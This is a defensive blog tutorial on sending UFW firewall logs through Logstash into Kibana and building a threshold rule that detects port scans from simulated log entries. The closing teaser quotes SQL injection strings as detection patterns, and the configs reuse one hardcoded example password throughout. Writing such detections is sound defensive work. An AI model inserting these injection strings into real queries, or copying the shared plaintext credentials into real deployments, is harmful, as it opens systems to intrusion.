<blockquote> <p>🔧 <strong>Stuck at any point?</strong> Jump to the <strong>Common Pitfalls</strong> section<br> at the bottom of this post before giving up — every error you're likely to hit is<br> documented there with an exact fix.</p> </blockquote> <h2> Prerequisites </h2> <ul> <li>ELK stack running from Part 1 (Elasticsearch, Logstash, Kibana with X-Pack security)</li> <li>Debian 12</li> <li> <code>sudo</code> access</li> </ul> <h2> Part 1: Install and Configure UFW </h2> <p>UFW (Uncomplicated Firewall) is the standard firewall manager on Debian/Ubuntu. It wraps<br> <code>iptables</code> and writes blocked connection attempts to syslog, which rsyslog routes to<br> <code>/var/log/ufw.log</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt <span class="nb">install </span>ufw <span class="nb">sudo </span>ufw <span class="nb">enable sudo </span>ufw logging on </code></pre> </div> <p>Verify UFW is active and logging:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>ufw status verbose </code></pre> </div> <p>You should see <code>Status: active</code> and <code>Logging: on (low)</code>.</p> <h3> What UFW Logs </h3> <p>Every time a connection is blocked by UFW, a line like this gets written to <code>/var/log/ufw.log</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Mar 2 14:23:01 fosres kernel: [1234567.890] [UFW BLOCK] IN=eth0 OUT= MAC=... SRC=192.168.1.100 DST=10.0.0.1 LEN=44 TOS=0x00 PREC=0x00 TTL=254 ID=54321 PROTO=TCP SPT=54321 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0 </code></pre> </div> <p>The key fields for port scan detection are:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Field</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td><code>SRC</code></td> <td>Attacker's source IP</td> </tr> <tr> <td><code>DST</code></td> <td>Target IP on your machine</td> </tr> <tr> <td><code>DPT</code></td> <td>Destination port being probed</td> </tr> <tr> <td><code>PROTO</code></td> <td>Protocol (TCP/UDP)</td> </tr> </tbody> </table></div> <p>A port scan is simply the same <code>SRC</code> IP hitting many different <code>DPT</code> values in rapid<br> succession.</p> <h3> Make UFW Log Readable by Logstash </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo chmod </span>o+r /var/log/ufw.log </code></pre> </div> <h2> Part 2: Update logstash.conf </h2> <p>Open your Logstash pipeline config:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nano ~/elk/logstash.conf </code></pre> </div> <blockquote> <p>⚠️ <strong>Debian 12 rsyslog timestamp warning:</strong> On Debian 12, rsyslog writes UFW logs using<br> ISO8601 format (<code>2026-03-02T15:06:22.881951-08:00</code>), <strong>not</strong> the traditional<br> <code>SYSLOGTIMESTAMP</code> format (<code>Mar 2 15:06:22</code>) that older tutorials use. Using the wrong<br> format causes <code>_grokparsefailure</code> on every UFW document — no fields will be extracted.<br> The config below uses <code>TIMESTAMP_ISO8601</code> and <code>ISO8601</code> date matching, which is correct<br> for Debian 12. Always verify your actual UFW log format first:</p> <pre class="highlight shell"><code><span class="nb">tail</span> <span class="nt">-5</span> /var/log/ufw.log </code></pre> </blockquote> <p>Add a second <code>file</code> input block and a new filter section for UFW. Here is the complete<br> updated <code>logstash.conf</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight ruby"><code><span class="n">input</span> <span class="p">{</span> <span class="n">file</span> <span class="p">{</span> <span class="n">path</span> <span class="o">=&gt;</span> <span class="s2">"/var/log/host/auth.log"</span> <span class="n">start_position</span> <span class="o">=&gt;</span> <span class="s2">"beginning"</span> <span class="n">sincedb_path</span> <span class="o">=&gt;</span> <span class="s2">"/usr/share/logstash/data/sincedb_auth"</span> <span class="n">type</span> <span class="o">=&gt;</span> <span class="s2">"auth"</span> <span class="p">}</span> <span class="n">file</span> <span class="p">{</span> <span class="n">path</span> <span class="o">=&gt;</span> <span class="s2">"/var/log/host/ufw.log"</span> <span class="n">start_position</span> <span class="o">=&gt;</span> <span class="s2">"beginning"</span> <span class="n">sincedb_path</span> <span class="o">=&gt;</span> <span class="s2">"/usr/share/logstash/data/sincedb_ufw"</span> <span class="n">type</span> <span class="o">=&gt;</span> <span class="s2">"ufw"</span> <span class="p">}</span> <span class="p">}</span> <span class="n">filter</span> <span class="p">{</span> <span class="k">if</span> <span class="p">[</span><span class="n">type</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"auth"</span> <span class="p">{</span> <span class="n">grok</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="s2">"message"</span> <span class="o">=&gt;</span> <span class="s2">"%{TIMESTAMP_ISO8601:timestamp} %{HOSTNAME:hostname} %{PROG:program}(?:</span><span class="se">\[</span><span class="s2">%{POSINT:pid}</span><span class="se">\]</span><span class="s2">)?: %{GREEDYDATA:log_message}"</span> <span class="p">}</span> <span class="p">}</span> <span class="n">date</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"timestamp"</span><span class="p">,</span> <span class="s2">"ISO8601"</span><span class="p">]</span> <span class="n">target</span> <span class="o">=&gt;</span> <span class="s2">"@timestamp"</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">log_message</span><span class="p">]</span> <span class="o">=~</span> <span class="sr">/Failed password/</span> <span class="p">{</span> <span class="n">grok</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="s2">"log_message"</span> <span class="o">=&gt;</span> <span class="s2">"Failed password for (invalid user )?%{USERNAME:failed_user} from %{IP:src_ip} port %{NUMBER:port}"</span> <span class="p">}</span> <span class="n">add_tag</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"failed_login"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">log_message</span><span class="p">]</span> <span class="o">=~</span> <span class="sr">/Accepted password/</span> <span class="p">{</span> <span class="n">grok</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="s2">"log_message"</span> <span class="o">=&gt;</span> <span class="s2">"Accepted password for %{USERNAME:success_user} from %{IP:src_ip} port %{NUMBER:port}"</span> <span class="p">}</span> <span class="n">add_tag</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"successful_login"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">log_message</span><span class="p">]</span> <span class="o">=~</span> <span class="sr">/sudo/</span> <span class="p">{</span> <span class="n">mutate</span> <span class="p">{</span> <span class="n">add_tag</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"sudo_command"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">type</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"ufw"</span> <span class="p">{</span> <span class="n">grok</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="s2">"message"</span> <span class="o">=&gt;</span> <span class="s2">"%{TIMESTAMP_ISO8601:timestamp} %{HOSTNAME:hostname} kernel: </span><span class="se">\[</span><span class="s2">%{NUMBER:uptime}</span><span class="se">\]</span><span class="s2"> </span><span class="se">\[</span><span class="s2">UFW %{WORD:ufw_action}</span><span class="se">\]</span><span class="s2"> IN=%{DATA:in_iface} OUT=%{DATA:out_iface}.*SRC=%{IP:src_ip} DST=%{IP:dst_ip}.*PROTO=%{WORD:protocol}(?:.*SPT=%{NUMBER:src_port} DPT=%{NUMBER:dst_port})?"</span> <span class="p">}</span> <span class="n">add_tag</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"ufw_event"</span><span class="p">]</span> <span class="p">}</span> <span class="n">date</span> <span class="p">{</span> <span class="n">match</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"timestamp"</span><span class="p">,</span> <span class="s2">"ISO8601"</span><span class="p">]</span> <span class="n">target</span> <span class="o">=&gt;</span> <span class="s2">"@timestamp"</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">ufw_action</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"BLOCK"</span> <span class="p">{</span> <span class="n">mutate</span> <span class="p">{</span> <span class="n">add_tag</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"ufw_blocked"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="n">output</span> <span class="p">{</span> <span class="k">if</span> <span class="p">[</span><span class="n">type</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"auth"</span> <span class="p">{</span> <span class="n">elasticsearch</span> <span class="p">{</span> <span class="n">hosts</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"http://elasticsearch:9200"</span><span class="p">]</span> <span class="n">user</span> <span class="o">=&gt;</span> <span class="s2">"elastic"</span> <span class="n">password</span> <span class="o">=&gt;</span> <span class="s2">"SecureELKPass2026!"</span> <span class="n">index</span> <span class="o">=&gt;</span> <span class="s2">"auth-logs-%{+YYYY.MM.dd}"</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">[</span><span class="n">type</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"ufw"</span> <span class="p">{</span> <span class="n">elasticsearch</span> <span class="p">{</span> <span class="n">hosts</span> <span class="o">=&gt;</span> <span class="p">[</span><span class="s2">"http://elasticsearch:9200"</span><span class="p">]</span> <span class="n">user</span> <span class="o">=&gt;</span> <span class="s2">"elastic"</span> <span class="n">password</span> <span class="o">=&gt;</span> <span class="s2">"SecureELKPass2026!"</span> <span class="n">index</span> <span class="o">=&gt;</span> <span class="s2">"ufw-logs-%{+YYYY.MM.dd}"</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h3> Key Design Decisions </h3> <p><strong>Both <code>auth.log</code> and <code>ufw.log</code> use <code>TIMESTAMP_ISO8601</code> on Debian 12</strong> — rsyslog on Debian<br> 12 writes ISO8601 timestamps to all log files including UFW. Many tutorials and older guides<br> use <code>SYSLOGTIMESTAMP</code> for UFW — this will cause <code>_grokparsefailure</code> on every document on<br> Debian 12. Always run <code>tail -5 /var/log/ufw.log</code> to verify your actual timestamp format<br> before writing your grok pattern.</p> <p><strong>SPT/DPT are optional in the grok pattern</strong> — some UFW blocked packets (like IGMP multicast<br> traffic with <code>PROTO=2</code>) have no source or destination port fields. Making them optional with<br> <code>(?:.*SPT=... DPT=...)?</code> prevents <code>_grokparsefailure</code> on those packets while still correctly<br> parsing TCP/UDP port scan events.</p> <p><strong>Separate indices for each log type</strong> — <code>auth-logs-*</code> and <code>ufw-logs-*</code> stay separate.<br> This makes queries faster (smaller index to scan), retention policies easier to manage, and<br> detection rules cleaner.</p> <p><strong>Two sincedb paths</strong> — each file input gets its own bookmark file so they track positions<br> independently.</p> <h2> Part 3: docker-compose.yml Reference </h2> <p>Your <code>docker-compose.yml</code> already mounts <code>/var/log</code> into the Logstash container at<br> <code>/var/log/host</code>. Since <code>ufw.log</code> lives in <code>/var/log/</code>, it's already accessible inside<br> the container at <code>/var/log/host/ufw.log</code>. No changes needed to the compose file.</p> <p>Here is the complete <code>docker-compose.yml</code> for reference:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">services</span><span class="pi">:</span> <span class="na">elasticsearch</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">docker.elastic.co/elasticsearch/elasticsearch:8.11.0</span> <span class="na">container_name</span><span class="pi">:</span> <span class="s">elasticsearch</span> <span class="na">environment</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">discovery.type=single-node</span> <span class="pi">-</span> <span class="s">xpack.security.enabled=true</span> <span class="pi">-</span> <span class="s">xpack.security.authc.api_key.enabled=true</span> <span class="pi">-</span> <span class="s">ES_JAVA_OPTS=-Xms2g -Xmx2g</span> <span class="pi">-</span> <span class="s">ELASTIC_PASSWORD=SecureELKPass2026!</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">9200:9200"</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">esdata:/usr/share/elasticsearch/data</span> <span class="na">kibana</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">docker.elastic.co/kibana/kibana:8.11.0</span> <span class="na">container_name</span><span class="pi">:</span> <span class="s">kibana</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">5601:5601"</span> <span class="na">depends_on</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">elasticsearch</span> <span class="na">environment</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">ELASTICSEARCH_HOSTS=http://elasticsearch:9200</span> <span class="pi">-</span> <span class="s">ELASTICSEARCH_USERNAME=kibana_system</span> <span class="pi">-</span> <span class="s">ELASTICSEARCH_PASSWORD=SecureELKPass2026!</span> <span class="pi">-</span> <span class="s">XPACK_ENCRYPTEDSAVEDOBJECTS_ENCRYPTIONKEY=a7a6311933d3503b89bc2dbc36572c33a6c10925682e591bffcab6911c06786d</span> <span class="na">logstash</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">docker.elastic.co/logstash/logstash:8.11.0</span> <span class="na">container_name</span><span class="pi">:</span> <span class="s">logstash</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">./logstash.conf:/usr/share/logstash/pipeline/logstash.conf</span> <span class="pi">-</span> <span class="s">/var/log:/var/log/host:ro</span> <span class="na">depends_on</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">elasticsearch</span> <span class="na">environment</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">LS_JAVA_OPTS=-Xms1g -Xmx1g</span> <span class="pi">-</span> <span class="s">xpack.monitoring.elasticsearch.hosts=http://elasticsearch:9200</span> <span class="pi">-</span> <span class="s">xpack.monitoring.elasticsearch.username=elastic</span> <span class="pi">-</span> <span class="s">xpack.monitoring.elasticsearch.password=SecureELKPass2026!</span> <span class="na">volumes</span><span class="pi">:</span> <span class="na">esdata</span><span class="pi">:</span> </code></pre> </div> <p>The critical line is the Logstash volume mount:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="pi">-</span> <span class="s">/var/log:/var/log/host:ro</span> </code></pre> </div> <p>This mounts your entire host <code>/var/log</code> directory into the container read-only at<br> <code>/var/log/host</code>. Both <code>auth.log</code> and <code>ufw.log</code> live in <code>/var/log/</code> on the host, so both<br> are accessible inside the container without any additional configuration.</p> <h2> Part 4: Restart Logstash </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> ~/elk docker compose restart logstash </code></pre> </div> <p>Wait 15 seconds then verify both pipelines started:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker logs logstash 2&gt;&amp;1 | <span class="nb">tail</span> <span class="nt">-10</span> </code></pre> </div> <p>You should see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[INFO] Pipeline started {"pipeline.id"=&gt;"main"} [INFO] Pipelines running {:count=&gt;2, ...} </code></pre> </div> <p>And confirm the new index was created:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-u</span> elastic:SecureELKPass2026! <span class="s1">'http://localhost:9200/_cat/indices?v'</span> | <span class="nb">grep </span>ufw </code></pre> </div> <p>If the <code>ufw-logs-*</code> index doesn't appear yet, UFW hasn't logged any blocked connections.<br> Move to Part 6 to generate test events first.</p> <blockquote> <p>⚠️ <strong>Note:</strong> You may see <code>Connection refused</code> errors at the top of the Logstash output.<br> This is normal — Logstash started before Elasticsearch was fully ready. As long as you see<br> <code>Restored connection to ES instance</code> and <code>Elasticsearch version determined</code> at the bottom,<br> Logstash has recovered and is healthy.</p> </blockquote> <h3> Wait for Kibana to Be Ready </h3> <p>Kibana takes 60-90 seconds to fully initialize after <code>docker compose up</code>. Before navigating<br> to <code>http://localhost:5601</code>, verify it's ready:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker logs kibana 2&gt;&amp;1 | <span class="nb">tail</span> <span class="nt">-5</span> </code></pre> </div> <p>Wait until you see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Kibana is now available </code></pre> </div> <p>Only then open your browser to <code>http://localhost:5601</code>. If you visit too early you'll see<br> "Kibana Server is not ready yet" — just wait and keep refreshing every 30 seconds.</p> <p>If you still see "Kibana Server is not ready yet" after 2 minutes, the <code>kibana_system</code><br> password likely needs to be reset. This happens whenever the <code>esdata</code> Docker volume is<br> recreated. Run:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-u</span> elastic:SecureELKPass2026! <span class="nt">-X</span> POST <span class="se">\</span> <span class="s1">'http://localhost:9200/_security/user/kibana_system/_password'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"password": "SecureELKPass2026!"}'</span> </code></pre> </div> <p>Then restart Kibana:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker restart kibana </code></pre> </div> <p>Wait 60-90 seconds and check again:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker logs kibana 2&gt;&amp;1 | <span class="nb">tail</span> <span class="nt">-5</span> </code></pre> </div> <p>You're ready when you see <code>Kibana is now available</code>.</p> <h2> Part 5: Create a Kibana Data View for UFW Logs </h2> <p>Open your browser to <code>http://localhost:5601</code> and log in with:</p> <ul> <li> <strong>Username:</strong> <code>elastic</code> </li> <li> <strong>Password:</strong> <code>SecureELKPass2026!</code> </li> </ul> <ol> <li>In Kibana, go to hamburger menu → <strong>Stack Management → Data Views</strong> </li> <li>Click <strong>"Create data view"</strong> </li> <li>Fill in: <ul> <li> <strong>Name:</strong> <code>ufw-logs</code> </li> <li> <strong>Index pattern:</strong> <code>ufw-logs-*</code> </li> <li> <strong>Timestamp field:</strong> <code>@timestamp</code> </li> </ul> </li> <li>Click <strong>Save data view to Kibana</strong> </li> </ol> <p><em>[SCREENSHOT: Data View creation for ufw-logs-</em>]*</p> <h2> Part 6: Generate Test Port Scan Events </h2> <p>Since you may not have real port scan traffic, simulate one by appending fake UFW BLOCK<br> entries directly to the log file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">for </span>port <span class="k">in </span>22 23 25 80 443 3306 5432 6379 8080 8443 27017 11211 6380 9200 5601 21 53<span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">date</span> <span class="nt">-Iseconds</span><span class="si">)</span><span class="s2"> </span><span class="si">$(</span><span class="nb">hostname</span><span class="si">)</span><span class="s2"> kernel: [123456.789] [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55 SRC=10.0.0.99 DST=192.168.1.1 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=12345 PROTO=TCP SPT=54321 DPT=</span><span class="nv">$port</span><span class="s2"> WINDOW=1024 RES=0x00 SYN URGP=0"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /var/log/ufw.log <span class="k">done</span> </code></pre> </div> <p>This simulates a single attacker (<code>10.0.0.99</code>) probing 17 distinct destination ports —<br> exactly the pattern a port scanner like <code>nmap</code> produces.</p> <p>Wait 15 seconds, then open Kibana → <strong>Analytics → Discover</strong>, select the <code>ufw-logs</code> data<br> view and search:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tags: ufw_blocked </code></pre> </div> <blockquote> <p>⚠️ <strong>Set the time range first</strong> — in the upper right corner of Kibana, click the clock<br> icon and set the time range from <strong>last week to now</strong> (e.g. "Last 7 days"). If the time<br> range doesn't include when you injected the events, Kibana will return no results even<br> though the data is there.</p> </blockquote> <p>You should see 17 documents all from <code>src_ip: 10.0.0.99</code>.</p> <p><em>[SCREENSHOT: Kibana Discover showing ufw_blocked events with src_ip and dst_port fields]</em></p> <h3> Verify Field Statistics </h3> <p>Click <strong>Field statistics</strong> tab and expand <code>src_ip</code> — you should see <code>10.0.0.99</code> at 100% of<br> events with 1 distinct value.</p> <p>For destination ports, expand <code>dst_port.keyword</code> (not <code>dst_port</code>) — you should see 17<br> distinct values in TOP VALUES. The plain <code>dst_port</code> field is a <code>text</code> type and only shows<br> Examples without statistics. The <code>.keyword</code> version is the aggregatable form Elasticsearch<br> creates automatically, and is what both Field statistics and detection rules use for counting.</p> <p>17 distinct ports from a single <code>src_ip</code> is the port scan signature: one attacker, many<br> probed ports.</p> <h2> Part 7: Build the Port Scan Detection Rule </h2> <p>Now build the Kibana SIEM detection rule that fires automatically when this pattern occurs.</p> <ol> <li>Hamburger menu → <strong>Security → Rules → Detection rules (SIEM)</strong> </li> <li>Click <strong>"Create new rule"</strong> </li> <li>Select <strong>"Threshold"</strong> rule type</li> <li>Click <strong>Continue</strong> </li> </ol> <p><em>[SCREENSHOT: Rule type selection with Threshold highlighted]</em></p> <h3> Step 1: Define Rule </h3> <ul> <li> <strong>Source:</strong> Click <strong>Data View</strong> tab → select <code>ufw-logs-*</code> </li> <li> <strong>Custom query:</strong> <code>tags: ufw_blocked</code> </li> <li> <strong>Group by:</strong> <code>src_ip.keyword</code> </li> <li> <strong>Threshold:</strong> <code>&gt;= 15</code> </li> <li> <strong>Count:</strong> select <code>dst_port.keyword</code> from the dropdown — this counts <strong>distinct</strong> destination ports per IP, not just total events</li> <li> <strong>Unique values:</strong> set to <code>15</code> — this is the minimum number of distinct destination ports that must be seen from a single IP before the alert fires</li> </ul> <p>Click <strong>Continue</strong>.</p> <p><em>[SCREENSHOT: Threshold rule configured with ufw-logs data view and dst_port cardinality]</em></p> <h3> Step 2: About Rule </h3> <ul> <li> <strong>Name:</strong> <code>Port Scan Detection</code> </li> <li> <strong>Description:</strong> <code>Alerts when a single IP address probes 15 or more distinct destination ports within the rule window, indicating automated port scanning activity.</code> </li> <li> <strong>Default severity:</strong> <code>Medium</code> </li> <li> <strong>Risk score:</strong> <code>47</code> </li> <li> <strong>Tags:</strong> <code>port-scan</code>, <code>reconnaissance</code>, <code>network</code> </li> </ul> <p>Click <strong>Continue</strong>.</p> <h3> Step 3: Schedule Rule </h3> <ul> <li> <strong>Runs every:</strong> <code>5 minutes</code> </li> <li> <strong>Additional look-back time:</strong> <code>1 minute</code> </li> </ul> <p>Click <strong>Continue</strong>.</p> <h3> Step 4: Rule Actions </h3> <p>Select <strong>Index</strong> connector type → use your existing <code>SSH_Brute_Force_Alerts</code> connector or<br> create a new one called <code>Security_Alerts_Index</code> writing to index <code>security-alerts</code>.</p> <p><strong>Document to index:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"rule_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{{rule.name}}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"alert_time"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{{date}}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"severity"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{{rule.severity}}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{{context.value}}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Port scan detected from {{context.value}} — probing multiple destination ports"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Click <strong>"Create &amp; enable rule"</strong>.</p> <h2> Part 8: Trigger and Verify the Alert </h2> <p>Inject a fresh batch of port scan events so they fall within the rule's 5-minute look-back<br> window:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">for </span>port <span class="k">in </span>22 23 25 80 443 3306 5432 6379 8080 8443 27017 11211 6380 9200 5601 21 53<span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">date</span> <span class="nt">-Iseconds</span><span class="si">)</span><span class="s2"> </span><span class="si">$(</span><span class="nb">hostname</span><span class="si">)</span><span class="s2"> kernel: [123456.789] [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55 SRC=10.0.0.99 DST=192.168.1.1 LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=12345 PROTO=TCP SPT=54321 DPT=</span><span class="nv">$port</span><span class="s2"> WINDOW=1024 RES=0x00 SYN URGP=0"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /var/log/ufw.log <span class="k">done</span> </code></pre> </div> <p>Wait 5 minutes, then navigate to <strong>Security → Alerts</strong>.</p> <p>You should see a new <strong>Port Scan Detection</strong> alert with Medium severity and Risk Score 47.</p> <p><em>[SCREENSHOT: Security Alerts page showing both SSH Brute Force and Port Scan Detection alerts]</em></p> <h2> Common Pitfalls </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Problem</th> <th>Cause</th> <th>Fix</th> </tr> </thead> <tbody> <tr> <td> <code>_grokparsefailure</code> on UFW events</td> <td>Wrong timestamp format in grok pattern</td> <td>On Debian 12, use <code>TIMESTAMP_ISO8601</code> and <code>ISO8601</code> date match — run <code>tail -5 /var/log/ufw.log</code> to verify your format first</td> </tr> <tr> <td> <code>ufw-logs-*</code> index not created</td> <td>UFW has no blocked connections yet</td> <td>Run the injection script in Part 6</td> </tr> <tr> <td> <code>/var/log/ufw.log</code> doesn't exist</td> <td>UFW not installed or logging not enabled</td> <td>Run <code>sudo ufw enable &amp;&amp; sudo ufw logging on</code> </td> </tr> <tr> <td>No <code>src_ip</code> or <code>dst_port</code> fields</td> <td>Grok pattern didn't match log line</td> <td>Check your UFW log format with <code>tail /var/log/ufw.log</code> and verify the pattern</td> </tr> <tr> <td> <code>src_ip</code>, <code>dst_port</code>, <code>protocol</code> appear under "Unmapped fields" in Discover</td> <td>Data view was created before grok-extracted fields existed in the index</td> <td>Go to <strong>Stack Management → Data Views → ufw-logs → Add field</strong> and manually add <code>src_ip</code>, <code>dst_port</code>, <code>protocol</code> as keyword type. This is safer than deleting the data view in production environments where other team members may depend on it.</td> </tr> <tr> <td>Alert never fires</td> <td>Events outside 5-minute look-back window</td> <td>Re-run injection script immediately before waiting 5 minutes</td> </tr> <tr> <td>UFW log unreadable by Logstash</td> <td>File permissions</td> <td>Run <code>sudo chmod o+r /var/log/ufw.log</code> </td> </tr> </tbody> </table></div> <h2> What You've Built </h2> <p>Your SIEM now detects two attack patterns autonomously:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Detection Rule</th> <th>Trigger</th> <th>Severity</th> </tr> </thead> <tbody> <tr> <td>SSH Brute Force Detection</td> <td>5+ failed logins from same IP / 5 min</td> <td>Medium</td> </tr> <tr> <td>Port Scan Detection</td> <td>15+ distinct ports from same IP / 5 min</td> <td>Medium</td> </tr> </tbody> </table></div> <p>The port scan rule catches the <strong>reconnaissance phase</strong> — the earliest stage of an attack,<br> before exploitation begins. In the real world, catching a port scan and blocking the source<br> IP buys you time and may prevent the attack entirely.</p> <h2> What's Next </h2> <p><strong>Part 3 of this series</strong> covers SQL injection detection using nginx access logs — building<br> a custom query rule that fires when HTTP requests contain SQLi patterns like <code>UNION SELECT</code>,<br> <code>' OR '1'='1</code>, and <code>--</code>. Stay tuned.</p> <blockquote> <p>🌟 If this post helped you, please star<br> <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer"><strong>SecEng-Exercises</strong></a> — a collection of<br> security engineering exercises for engineers who want to write more secure code and break<br> into Security Engineering roles. Every star helps the project grow.</p> <p>📊 And take 30 seconds to tell me<br> <a href="https://strawpoll.com/wby5QoKAkyA/results" rel="noopener noreferrer"><strong>why you read security engineering blog posts</strong></a>.<br> The live results are public — see what other engineers say.</p> </blockquote> monitoring networking security tutorial